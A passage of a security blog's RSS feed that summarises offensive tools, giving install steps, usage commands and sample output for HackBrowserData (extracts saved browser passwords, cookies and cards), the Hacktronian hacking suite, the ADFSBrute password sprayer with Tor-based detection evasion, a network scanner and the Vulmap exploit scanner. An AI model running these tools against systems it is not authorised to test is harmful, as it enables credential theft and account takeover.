<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">Firefox ESR</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">Firefox Nightly</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
</tbody>
</table>
<h2><a id="user-content-install" class="anchor" href="https://github.com/moonD4rk/HackBrowserData#install" target="_blank" rel="nofollow noopener" aria-hidden="true"></a><strong>Install</strong></h2>
<p dir="auto">Installation of <code>HackBrowserData</code> is dead-simple, just download <a href="https://github.com/moonD4rk/HackBrowserData/releases" target="_blank" rel="nofollow noopener">the release for your system</a> and run the binary.</p>
<blockquote>
<p dir="auto">In some situations, this security tool will be treated as a virus by Windows Defender or other antivirus software and can not be executed. The code is all open source, you can modify and compile by yourself.</p>
</blockquote>
<h3><a id="user-content-building-from-source" class="anchor" href="https://github.com/moonD4rk/HackBrowserData#building-from-source" target="_blank" rel="nofollow noopener" aria-hidden="true"></a><strong>Building from source</strong></h3>
<p dir="auto">support <code>go 1.14+</code></p>
<div class="highlight highlight-source-shell position-relative overflow-auto">
<pre>git clone https://github.com/moonD4rk/HackBrowserData

<span class="pl-c1">cd</span> HackBrowserData

go build</pre>
</div>
<p><strong>Cross compile</strong></p>
<p>Need to install target OS&#8217;s <code>gcc</code> library, here&#8217;s an example of the use <code>Mac</code> building for <code>Windows</code> and <code>Linus</code></p>
<h3><strong>Windows</strong></h3>
<div class="highlight highlight-source-shell">
<pre>brew install mingw-w64

CGO_ENABLED=1 GOOS=windows GOARCH=amd64 CC=<span class="pl-s"><span class="pl-pds">"</span>x86_64-w64-mingw32-gcc<span class="pl-pds">"</span></span> go build</pre>
</div>
<h3><strong>Linux</strong></h3>
<div class="highlight highlight-source-shell">
<pre>brew install FiloSottile/musl-cross/musl-cross

CC=x86_64-linux-musl-gcc CXX=x86_64-linux-musl-g++ GOARCH=amd64 GOOS=linux CGO_ENABLED=1 go build -ldflags <span class="pl-s"><span class="pl-pds">"</span>-linkmode external -extldflags -static<span class="pl-pds">"</span></span></pre>
</div>
<h3><a id="user-content-run" class="anchor" href="https://github.com/moonD4rk/HackBrowserData#run" target="_blank" rel="nofollow noopener" aria-hidden="true"></a><strong>Run</strong></h3>
<p>You can double-click to run, or use the command line.</p>
<pre><code>PS C:\test&gt; .\hack-browser-data.exe -h
NAME:
   hack-browser-data - Export passwords/cookies/history/bookmarks from browser
USAGE:
   [hack-browser-data -b chrome -f json -dir results -cc]
   Get all data(password/cookie/history/bookmark) from chrome
VERSION:
   0.3.7</code></pre>
<pre><code>GLOBAL OPTIONS:
   --verbose, --vv                     verbose (default: false)
   --compress, --cc                    compress result to zip (default: false)
   --browser value, -b value           available browsers: all|opera|firefox|chrome|edge (default: "all")
   --results-dir value, --dir value    export dir (default: "results")
   --format value, -f value            format, csv|json|console (default: "csv")
   --profile-dir-path value, -p value  custom profile dir path, get with chrome://version
   --key-file-path value, -k value     custom key file path
   --help, -h                          show help (default: false)
   --version, -v                       print the version (default: false)

PS C:\test&gt;  .\hack-browser-data.exe -b all -f json --dir results -cc
[x]:  Get 44 cookies, filename is results/microsoft_edge_cookie.json
[x]:  Get 54 history, filename is results/microsoft_edge_history.json
[x]:  Get 1 passwords, filename is results/microsoft_edge_password.json
[x]:  Get 4 bookmarks, filename is results/microsoft_edge_bookmark.json
[x]:  Get 6 bookmarks, filename is results/360speed_bookmark.json
[x]:  Get 19 cookies, filename is results/360speed_cookie.json
[x]:  Get 18 history, filename is results/360speed_history.json
[x]:  Get 1 passwords, filename is results/360speed_password.json
[x]:  Get 12 history, filename is results/qq_history.json
[x]:  Get 1 passwords, filename is results/qq_password.json
[x]:  Get 12 bookmarks, filename is results/qq_bookmark.json
[x]:  Get 14 cookies, filename is results/qq_cookie.json
[x]:  Get 28 bookmarks, filename is results/firefox_bookmark.json
[x]:  Get 10 cookies, filename is results/firefox_cookie.json
[x]:  Get 33 history, filename is results/firefox_history.json
[x]:  Get 1 passwords, filename is results/firefox_password.json
[x]:  Get 1 passwords, filename is results/chrome_password.json
[x]:  Get 4 bookmarks, filename is results/chrome_bookmark.json
[x]:  Get 6 cookies, filename is results/chrome_cookie.json
[x]:  Get 6 history, filename is results/chrome_history.json
[x]:  Compress success, zip filename is results/archive.zip</code><code></code></pre>
<h3 dir="auto">Run with custom browser profile path</h3>
<div class="snippet-clipboard-content position-relative overflow-auto">
<pre><code>PS C:\Users\User\Desktop&gt; .\hack-browser-data.exe -b edge -p 'C:\Users\User\AppData\Local\Microsoft\Edge\User Data\Default' -k 'C:\Users\User\AppData\Local\Microsoft\Edge\User Data\Local State'

[x]:  Get 29 history, filename is results/microsoft_edge_history.csv
[x]:  Get 0 passwords, filename is results/microsoft_edge_password.csv
[x]:  Get 1 credit cards, filename is results/microsoft_edge_credit.csv
[x]:  Get 4 bookmarks, filename is results/microsoft_edge_bookmark.csv
[x]:  Get 54 cookies, filename is results/microsoft_edge_cookie.csv


PS C:\Users\User\Desktop&gt; .\hack-browser-data.exe -b edge -p 'C:\Users\User\AppData\Local\Microsoft\Edge\User Data\Default'

[x]:  Get 1 credit cards, filename is results/microsoft_edge_credit.csv
[x]:  Get 4 bookmarks, filename is results/microsoft_edge_bookmark.csv
[x]:  Get 54 cookies, filename is results/microsoft_edge_cookie.csv
[x]:  Get 29 history, filename is results/microsoft_edge_history.csv
[x]:  Get 0 passwords, filename is results/microsoft_edge_password.csv</code></pre>
</div>
<p>The post <a href="http://kostacipo.stream/hackbrowserdata-decrypt-passwords-cookies-history-bookmarks-from-the-browser/">HackBrowserData &#8211; Decrypt passwords/cookies/history/bookmarks from the browser</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>http://kostacipo.stream/hackbrowserdata-decrypt-passwords-cookies-history-bookmarks-from-the-browser/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Hacktronian: All in One Hacking Tool for Linux</title>
		<link>http://kostacipo.stream/hacktronian-all-in-one-hacking-tool-for-linux/</link>
					<comments>http://kostacipo.stream/hacktronian-all-in-one-hacking-tool-for-linux/#respond</comments>
		
		<dc:creator><![CDATA[Majordomo]]></dc:creator>
		<pubDate>Sun, 22 Aug 2021 19:05:06 +0000</pubDate>
				<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[Hacks]]></category>
		<category><![CDATA[Pentesting]]></category>
		<category><![CDATA[Tools]]></category>
		<category><![CDATA[Hacker Tools]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[linux]]></category>
		<guid isPermaLink="false">https://kostacipo.stream/?p=2099</guid>

					<description><![CDATA[<p>Hacktronian is an all in one hacking suite for Linux and Android. It contains tools for different phases from information gathering to post exploitation. This makes it a handy tool for any penetration tester. Hackronian contains a diverse range of tools which allow the user to gain information, attack targets, perform sniffing and snooping on [&#8230;]</p>
<p>The post <a href="http://kostacipo.stream/hacktronian-all-in-one-hacking-tool-for-linux/">Hacktronian: All in One Hacking Tool for Linux</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>Hacktronian is an all in one hacking suite for Linux and Android. It contains tools for different phases from information gathering to post exploitation. This makes it a handy tool for any penetration tester.</p>
<p>Hackronian contains a diverse range of tools which allow the user to gain information, attack targets, perform sniffing and snooping on targets and perform post exploitation operations on the target. This main benefit of this suite is that all these different tools are available in one place and the user can experiment with different tools within the same terminal. The secondary benefit of this tool is that it can be installed on Android with all the same features.</p>
<h3 class="accent-green">Features:</h3>
<ul>
<li>Contains more than 50 different tools</li>
<li>Modules range from information gathering to post exploitation</li>
<li>Available for both Android and Linux</li>
<li>Perfect for creating a penetration testing workflow</li>
</ul>
<h2>HACKTRONIAN Menu :</h2>
<ul>
<li>Information Gathering</li>
<li>Password Attacks</li>
<li>Wireless Testing</li>
<li>Exploitation Tools</li>
<li>Sniffing &amp; Spoofing</li>
<li>Web Hacking</li>
<li>Private Web Hacking</li>
<li>Post Exploitation</li>
<li>Install The HACKTRONIAN</li>
</ul>
<h3>Information Gathering:</h3>
<ul>
<li>Nmap</li>
<li>Setoolkit</li>
<li>Port Scanning</li>
<li>Host To IP</li>
<li>wordpress user</li>
<li>CMS scanner</li>
<li>XSStrike</li>
<li>Dork &#8211; Google Dorks Passive Vulnerability Auditor</li>
<li>Scan A server&#8217;s Users</li>
<li>Crips</li>
</ul>
<h3>Password Attacks:</h3>
<ul>
<li>Cupp</li>
<li>Ncrack</li>
</ul>
<h3></h3>
<h3>Wireless Testing:</h3>
<ul>
<li>reaver</li>
<li>pixiewps</li>
<li>Fluxion</li>
</ul>
<h3>Exploitation Tools:</h3>
<ul>
<li>ATSCAN</li>
<li>sqlmap</li>
<li>Shellnoob</li>
<li>commix</li>
<li>FTP Auto Bypass</li>
<li>jboss-autopwn</li>
</ul>
<h3>Sniffing &amp; Spoofing:</h3>
<ul>
<li>Setoolkit</li>
<li>SSLtrip</li>
<li>pyPISHER</li>
<li>SMTP Mailer</li>
</ul>
<h3>Web Hacking:</h3>
<ul>
<li>Drupal Hacking</li>
<li>Inurlbr</li>
<li>WordPress &amp; Joomla Scanner</li>
<li>Gravity Form Scanner</li>
<li>File Upload Checker</li>
<li>WordPress Exploit Scanner</li>
<li>WordPress Plugins Scanner</li>
<li>Shell and Directory Finder</li>
<li>Joomla! 1.5 &#8211; 3.4.5 remote code execution</li>
<li>Vbulletin 5.X remote code execution</li>
<li>BruteX &#8211; Automatically brute force all services running on a target</li>
<li>Arachni &#8211; Web Application Security Scanner Framework</li>
</ul>
<h3>Private Web Hacking:</h3>
<ul>
<li>Get all websites</li>
<li>Get joomla websites</li>
<li>Get wordpress websites</li>
<li>Control Panel Finder</li>
<li>Zip Files Finder</li>
<li>Upload File Finder</li>
<li>Get server users</li>
<li>SQli Scanner</li>
<li>Ports Scan (range of ports)</li>
<li>ports Scan (common ports)</li>
<li>Get server Info</li>
<li>Bypass Cloudflare</li>
</ul>
<h3>Post Exploitation:</h3>
<ul>
<li>Shell Checker</li>
<li>POET</li>
<li>Weeman</li>
</ul>
<h3 class="accent-green">Supported Platforms:</h3>
<ul>
<li>Linux</li>
<li>Android (Termux)</li>
</ul>
<h2>Installation in Linux :</h2>
<p>This Tool Must Run As ROOT !!!</p>
<p><code>git clone https://github.com/thehackingsage/hacktronian.git</code></p>
<p><code>cd hacktronian</code></p>
<p><code>chmod +x install.sh</code></p>
<p><code>./install.sh</code></p>
<p>That&#8217;s it.. you can execute tool by typing <strong>hacktronian</strong></p>
<h2>Installation in Android :</h2>
<p>Open <a href="https://play.google.com/store/apps/details?id=com.termux" rel="nofollow">Termux</a></p>
<p><code>pkg install git</code></p>
<p><code>pkg install python</code></p>
<p><code>git clone https://github.com/thehackingsage/hacktronian.git</code></p>
<p><code>cd hacktronian</code></p>
<p><code>chmod +x hacktronian.py</code></p>
<p><code>python2 hacktronian.py</code></p>
<h2>Video Tutorial :</h2>
<p>YouTube : <a href="https://www.youtube.com/watch?v=1LJlyQAQby4" rel="nofollow">https://www.youtube.com/watch?v=1LJlyQAQby4</a></p>
<h2>Hacktronian Usage</h2>
<p>To execute Hacktronian, run:</p>
<pre class="wp-block-preformatted">$ hacktronian</pre>
<pre class="wp-block-preformatted"> _   _    _    ____ _  _______ ____   ___  _   _ ___    _    _   _ 
| | | |  / \  / ___| |/ /_   _|  _ \ / _ \| \ | |_ _|  / \  | \ | |
| |_| | / _ \| |   | ' /  | | | |_) | | | |  \| || |  / _ \ |  \| |
|  _  |/ ___ \ |___| . \  | | |  _ &lt;| |_| | |\  || | / ___ \| |\  |
|_| |_/_/   \_\____|_|\_\ |_| |_| \_\_ __/|_| \_|___/_/   \_\_| \_|
 
[!] This Tool Must Run As ROOT [!] https://linktr.ee/thehackingsage
 
   {1}--Information Gathering
   {2}--Password Attacks
   {3}--Wireless Testing
   {4}--Exploitation Tools
   {5}--Sniffing &amp; Spoofing
   {6}--Web Hacking
   {7}--Private Web Hacking
   {8}--Post Exploitation
   {0}--Install The HACKTRONIAN
   {99}-Exit
 
hacktronian~#</pre>
<p><strong>Download</strong>: <a href="https://github.com/thehackingsage/hacktronian">https://github.com/thehackingsage/hacktronian</a></p>
<div class="row justify-content-center mb-3">
<div class="col-lg-4"></div>
</div>
<p>The post <a href="http://kostacipo.stream/hacktronian-all-in-one-hacking-tool-for-linux/">Hacktronian: All in One Hacking Tool for Linux</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>http://kostacipo.stream/hacktronian-all-in-one-hacking-tool-for-linux/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Offensive Security Tool: ADFSBrute</title>
		<link>http://kostacipo.stream/offensive-security-tool-adfsbrute/</link>
					<comments>http://kostacipo.stream/offensive-security-tool-adfsbrute/#respond</comments>
		
		<dc:creator><![CDATA[Majordomo]]></dc:creator>
		<pubDate>Sun, 25 Apr 2021 23:05:03 +0000</pubDate>
				<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[Hacks]]></category>
		<category><![CDATA[Pentesting]]></category>
		<category><![CDATA[Tools]]></category>
		<category><![CDATA[bruteforce]]></category>
		<guid isPermaLink="false">https://kostacipo.stream/?p=2084</guid>

					<description><![CDATA[<p>Offensive Security Tool: ADFSBrute GitHub Link adfsbrute ADFSBrute by ricardojoserf, is a script to test credentials against Active Directory Federation Services (ADFS), calculating the ADFS url of an organization and allowing password spraying or bruteforce attacks. The main idea is carrying out password spraying attacks with a random and high delay between each test and [&#8230;]</p>
<p>The post <a href="http://kostacipo.stream/offensive-security-tool-adfsbrute/">Offensive Security Tool: ADFSBrute</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><strong>Offensive Security Tool: ADFSBrute</strong></p>
<p><a href="https://github.com/blackhatethicalhacking/adfsbrute">GitHub Link</a></p>
<p><strong>adfsbrute</strong></p>
<p>ADFSBrute by ricardojoserf, is a script to test credentials against Active Directory Federation Services (ADFS), calculating the ADFS url of an organization and allowing password spraying or bruteforce attacks.</p>
<p>The main idea is carrying out password spraying attacks with a random and high delay between each test and using a list of proxies or <a href="https://github.com/ricardojoserf/adfsbrute#using-tor" data-et-has-event-already="true">Tor</a> to make the detection by the Blue Team more difficult. Brute force attacks are also possible, or testing credentials with the format <em>username:password</em> (for example from <a href="https://github.com/davidtavarez/pwndb">Pwndb</a>). Tested logins will get stored in a log file to avoid testing them twice.</p>
<p><strong>Usage</strong></p>
<pre><strong><code>./adfsbrute.py -t TARGET [-u USER] [-U USER_LIST] [-p PASSWORD] [-P PASSWORD_LIST] [-UL userpassword_list]
[-m MIN_TIME] [-M MAX_TIME] [-tp TOR_PASSWORD] [-pl PROXY_LIST] [-n NUMBER_OF_REQUESTS_PER_IP]
[-s STOP_ON_SUCCESS] [-r RANDOM_COMBINATIONS] [-d DEBUG] [-l LOG_FILE]</code></strong></pre>
<p>The parameters for the attacks are:</p>
<pre><strong><code>* -t: Target domain. Example: test.com

* -u: Single username. Example: agarcia@domain.com

* -U: File with a list of usernames. Example: users.txt

* -p: Single password: Example: Company123

* -P: File with a list of passwords. Example: passwords.txt

* -UP: File with a list of credentials in the format "username:password". Example: userpass.txt

* -m : Minimum value of random seconds to wait between each test. Default: 30

* -M : Maximum value of random seconds to wait between each test. Default: 60

* -tp: Tor password (change IP addresses using Tor)

* -pl: Use a proxy list (change IP addresses using a list of proxy IPs)

* -n: Number of requests before changing IP address (used with -tp or -pl). Default: 1

* -s: Stop on success, when one correct credential is found. Default: False

* -r: Randomize the combination of users and passwords. Default: True

* -d: Show debug messages. Default: True

* -l: Log file location with already tested credentials. Default: tested.txt</code></strong></pre>
<p><strong>Examples</strong></p>
<p>Password spraying with password “Company123”, tor password is “test123” and changing the IP every 3 requests:</p>
<pre><strong><code>python3 adfsbrute.py -t company.com -U users.txt -p Company123 -tp test123 -n 3</code></strong></pre>
<p><img loading="lazy" decoding="async" class="wp-image-252386 alignnone size-full" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2021/04/image1.png" sizes="auto, (min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) 826px, 100vw" srcset="https://www.blackhatethicalhacking.com/wp-content/uploads/2021/04/image1.png 826w, https://www.blackhatethicalhacking.com/wp-content/uploads/2021/04/image1-480x456.png 480w" alt="" width="826" height="785" /></p>
<p>Password spraying with password “Company123”, tor password is “test123”, changing the IP for every request, random delay time between 10 and 20 seconds and do not randomize the order of users:</p>
<pre><strong><code>python3 adfsbrute.py -t company.com -U users.txt -p Company123 -tp test123 -m 10 -M 20 -r False</code></strong></pre>
<p><img loading="lazy" decoding="async" class="wp-image-252387 alignnone size-full" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2021/04/image2.png" sizes="auto, (min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) 826px, 100vw" srcset="https://www.blackhatethicalhacking.com/wp-content/uploads/2021/04/image2.png 826w, https://www.blackhatethicalhacking.com/wp-content/uploads/2021/04/image2-480x484.png 480w" alt="" width="826" height="833" /></p>
<p>Finding ADFS url:</p>
<pre><strong><code>python3 adfsbrute.py -t company.com</code></strong></pre>
<p><img loading="lazy" decoding="async" class="wp-image-252388 alignnone size-full" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2021/04/image3.png" sizes="auto, (min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) 829px, 100vw" srcset="https://www.blackhatethicalhacking.com/wp-content/uploads/2021/04/image3.png 829w, https://www.blackhatethicalhacking.com/wp-content/uploads/2021/04/image3-480x100.png 480w" alt="" width="829" height="173" /></p>
<p><strong>Using Tor</strong></p>
<p>To use Tor to change the IP for every request, you must hash a password:</p>
<pre><strong><code>tor --hash-password test123</code></strong></pre>
<p>In the file /etc/tor/torrc, uncomment the variable <em>ControlPort</em> and the variable <em>HashedControlPassword</em>, and in this last one add the hash:</p>
<pre><strong><code>ControlPort 9051
HashedControlPassword 16:7F314CAB402A81F860B3EE449B743AEC0DED9F27FA41831737E2F08F87</code></strong></pre>
<p>Restart the tor service and use this password as argument for the script (“-tp test123” or “–tor_password 123”)</p>
<pre><strong><code>service tor restart</code></strong></pre>
<p><strong>Note</strong></p>
<p>This script is implemented to test in security audits, DO NOT use without proper authorization from the company owning the ADFS or you will block accounts.</p>
<p>The post <a href="http://kostacipo.stream/offensive-security-tool-adfsbrute/">Offensive Security Tool: ADFSBrute</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>http://kostacipo.stream/offensive-security-tool-adfsbrute/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Astsu: Network Scanning Tool</title>
		<link>http://kostacipo.stream/astsu-network-scanning-tool/</link>
					<comments>http://kostacipo.stream/astsu-network-scanning-tool/#respond</comments>
		
		<dc:creator><![CDATA[Majordomo]]></dc:creator>
		<pubDate>Sun, 21 Feb 2021 15:24:58 +0000</pubDate>
				<category><![CDATA[Hacks]]></category>
		<category><![CDATA[Networks]]></category>
		<category><![CDATA[Tools]]></category>
		<category><![CDATA[network scanning]]></category>
		<guid isPermaLink="false">http://kostacipo.stream/?p=2049</guid>

					<description><![CDATA[<p>Astsu is a network scanning tool which can be used to perform basic network reconnaissance tasks. It has been developed in Python 3 using the Scapy packet manipulation tool. Astsu: Network Scanning Tool Astsu performs three major tasks. The first function is the ability to scan common ports and check whether they are open or not. If [&#8230;]</p>
<p>The post <a href="http://kostacipo.stream/astsu-network-scanning-tool/">Astsu: Network Scanning Tool</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>Astsu is a network scanning tool which can be used to perform basic network reconnaissance tasks. It has been developed in Python 3 using the <a href="https://www.cyberpunk.rs/scapy-interactive-packet-manipulation-tool">Scapy</a> packet manipulation tool.</p>
<h2>Astsu: Network Scanning Tool</h2>
<p>Astsu performs three major tasks. The first function is the ability to scan common ports and check whether they are open or not. If a port is open, the tool will then use nmap to check the service being run on the port. The second ability of Astsu is to discover hosts operating on the network. It does this by using the routers IP to map all possible IP’s and then send packets to each IP and wait for a response. The last objective which Astsu achieves is the ability to determine the Operating System of a host on a network. It does this by analyzing a packet received from the target for the OS details.</p>
<p>A great option of this tool is that the user can choose the network protocol to use in the scan. In addition to this, the user can also define how long the tool should wait before it timeouts.</p>
<h3 class="accent-green">Features:</h3>
<ul>
<li>Perform basic network reconnaissance with this tool</li>
<li>Scan the ports of a target IP address and check which ports are open or closed and what services are running on them</li>
<li>Discover the hosts in a network</li>
<li>Scan a host for the Operating System</li>
<li>Can be used in the reconnaissance phase of a penetration test</li>
<li>Option to use a stealth scan method to hide the user’s identity</li>
<li>Option to scan a range of ports or scan all the ports</li>
</ul>
<h2>
How it works</h2>
<ul>
<li>
<h4>Scan common ports</h4>
</li>
</ul>
<p>Send a TCP Syn packet to the destination on the defined port, if the port is open, use an nmap scan to check the service running on the port and prints all the ports found.</p>
<ul>
<li>
<h4>Discover hosts in network</h4>
</li>
</ul>
<p>Uses as a base the router&#8217;s ip to map all possible ips. It then sends an ICMP packet to each IP, and waits for a response, if it receives any response saved in an array the IP of the online host, and when it finishes checking all hosts, prints all hosts online.</p>
<ul>
<li>
<h4>OS Scan</h4>
</li>
</ul>
<p>Sends an ICMP packet to the destination and waits for a response. Then, extracts the TTL from the destination response and checks the possible OS in a list, if have founded, prints it.</p>
<h2>OS Support</h2>
<ul>
<li><strong>Windows</strong> <img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2714.png" alt="✔" class="wp-smiley" style="height: 1em; max-height: 1em;" /></li>
<li><strong>Linux</strong> <img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2714.png" alt="✔" class="wp-smiley" style="height: 1em; max-height: 1em;" /></li>
<li><strong>Mac</strong> <img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2753.png" alt="❓" class="wp-smiley" style="height: 1em; max-height: 1em;" /></li>
</ul>
<h2></h2>
<h2>How to install</h2>
<p>Clone this repository <code>git clone https://github.com/ReddyyZ/astsu.git</code></p>
<ul>
<li>Install python 3.
<ul>
<li>Linux
<ul>
<li><code>apt-get install python3</code></li>
<li><code>chmod +x *</code></li>
<li><code>python3 -m pip install -r requirements.txt</code></li>
<li><code>python3 install.py</code></li>
<li>Done!</li>
</ul>
</li>
<li>Windows
<ul>
<li><a href="https://www.python.org/downloads/" rel="nofollow">Python 3, download and install</a></li>
<li><code>python3 -m pip install -r requirements.txt</code></li>
<li><code>python3 install.py</code></li>
<li>Done!</li>
</ul>
</li>
</ul>
</li>
</ul>
<h2></h2>
<h2>Arguments</h2>
<ul>
<li><strong>-sC</strong> | Scan common ports
<ul>
<li><strong>-p</strong> | Protocol to use in the scan</li>
<li><strong>-i</strong> | Interface to use</li>
<li><strong>-t</strong> | Timeout to each request</li>
<li><strong>-st</strong> | Use stealth scan method (TCP)</li>
</ul>
</li>
<li><strong>-sA</strong> | Scan all ports
<ul>
<li><strong>-p</strong> | Protocol to use in the scan</li>
<li><strong>-i</strong> | Interface to use</li>
<li><strong>-t</strong> | Timeout to each request</li>
<li><strong>-st</strong> | Use stealth scan method (TCP)</li>
</ul>
</li>
<li><strong>-sP</strong> | Scan a range ports
<ul>
<li><strong>-p</strong> | Protocol to use in the scan</li>
<li><strong>-i</strong> | Interface to use</li>
<li><strong>-t</strong> | Timeout to each request</li>
<li><strong>-st</strong> | Use stealth scan method (TCP)</li>
</ul>
</li>
<li><strong>-sO</strong> | Scan OS of a target</li>
<li><strong>-d</strong> | Discover hosts in the network
<ul>
<li><strong>-p</strong> | Protocol to use in the scan</li>
<li><strong>-i</strong> | Interface to use</li>
</ul>
</li>
</ul>
<h2></h2>
<h2>Examples</h2>
<ul>
<li>Discover hosts</li>
</ul>
<div class="highlight highlight-source-shell">
<pre>astsu -d</pre>
</div>
<ul>
<li>Scan common ports using SYN Scan</li>
</ul>
<div class="highlight highlight-source-shell">
<pre>astsu -sC -st 192.168.1.1</pre>
</div>
<ul>
<li>Scan a range of ports</li>
</ul>
<div class="highlight highlight-source-shell">
<pre>astsu 192.168.1.1 -sP 1 443</pre>
</div>
<ul>
<li>Scan OS</li>
</ul>
<div class="highlight highlight-source-shell">
<pre>astsu -sO 192.168.1.1</pre>
</div>
<h2>License</h2>
<p>This project is under the <a href="https://github.com/ReddyyZ/astsu/blob/master/LICENSE">MIT License</a>.</p>
<p>The post <a href="http://kostacipo.stream/astsu-network-scanning-tool/">Astsu: Network Scanning Tool</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>http://kostacipo.stream/astsu-network-scanning-tool/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Vulmap : Web Vulnerability Scanning &#038; Verification Tools</title>
		<link>http://kostacipo.stream/vulmap-web-vulnerability-scanning-verification-tools/</link>
					<comments>http://kostacipo.stream/vulmap-web-vulnerability-scanning-verification-tools/#respond</comments>
		
		<dc:creator><![CDATA[Majordomo]]></dc:creator>
		<pubDate>Sun, 31 Jan 2021 20:10:59 +0000</pubDate>
				<category><![CDATA[Hacks]]></category>
		<category><![CDATA[Tools]]></category>
		<category><![CDATA[Vulnerability Analysis]]></category>
		<category><![CDATA[vulnerability analysis]]></category>
		<category><![CDATA[vulnerability scanning]]></category>
		<guid isPermaLink="false">http://kostacipo.stream/?p=2019</guid>

					<description><![CDATA[<p>Vulmap is a vulnerability scanning tool that can scan for vulnerabilities in Web containers, Web servers, Web middleware, and CMS and other Web programs, and has vulnerability exploitation functions. Relevant testers can use vulmap to detect whether the target has a specific vulnerability, and can use the vulnerability exploitation function to verify whether the vulnerability [&#8230;]</p>
<p>The post <a href="http://kostacipo.stream/vulmap-web-vulnerability-scanning-verification-tools/">Vulmap : Web Vulnerability Scanning &#038; Verification Tools</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><strong>Vulmap </strong>is a vulnerability scanning tool that can scan for vulnerabilities in Web containers, Web servers, Web middleware, and CMS and other Web programs, and has vulnerability exploitation functions. Relevant testers can use vulmap to detect whether the target has a specific vulnerability, and can use the vulnerability exploitation function to verify whether the vulnerability actually exists.</p>
<p>It is currently has vulnerability scanning (poc) and exploiting (exp) modes. Use “-m” to select which mode to use, and the default poc mode is the default. In poc mode, it also supports “-f” batch target scanning, “-o” File output results and other main functions, Other functions <a href="https://github.com/zhzyker/vulmap/#options">Options</a> Or python3 vulmap.py -h, the Poc function will no longer be provided in the exploit exploit mode, but the exploit will be carried out directly, and the exploit result will be fed back to further verify whether the vulnerability exists and whether it can be exploited.</p>
<p><strong>Try to use “-a” to establish target types to reduce false positives, such as “-a solr”</strong></p>
<div class="code-block code-block-2">&nbsp;</div>
<p class="has-text-align-center has-vivid-green-cyan-background-color has-background"><strong>Installation</strong></p>
<p>The operating system must have python3, python3.7 or higher is recommended</p>
<ul>
<li>Installation dependency</li>
</ul>
<p class="has-vivid-green-cyan-color has-black-background-color has-text-color has-background"><strong>pip3 install -r requirements.txt </strong></p>
<ul>
<li>Linux &amp; MacOS &amp; Windows</li>
</ul>
<p class="has-vivid-green-cyan-color has-black-background-color has-text-color has-background"><strong>python3 vulmap.py -u http://example.com </strong></p>
<p class="has-text-align-center has-vivid-green-cyan-background-color has-background"><strong>Options</strong></p>
<p class="has-vivid-green-cyan-color has-black-background-color has-text-color has-background">optional arguments:<br />
-h, –help show this help message and exit<br />
-u URL, –url URL Target URL (e.g. -u “http://example.com”)<br />
-f FILE, –file FILE Select a target list file, and the url must be distinguished by lines (e.g. -f “/home/user/list.txt”)<br />
-m MODE, –mode MODE The mode supports “poc” and “exp”, you can omit this option, and enter poc mode by default<br />
-a APP, –app APP Specify a web app or cms (e.g. -a “weblogic”). default scan all<br />
-c CMD, –cmd CMD Custom RCE vuln command, Other than “netstat -an” and “id” can affect program judgment. defautl is “netstat -an”<br />
-v VULN, –vuln VULN Exploit, Specify the vuln number (e.g. -v “CVE-2020-2729”)<br />
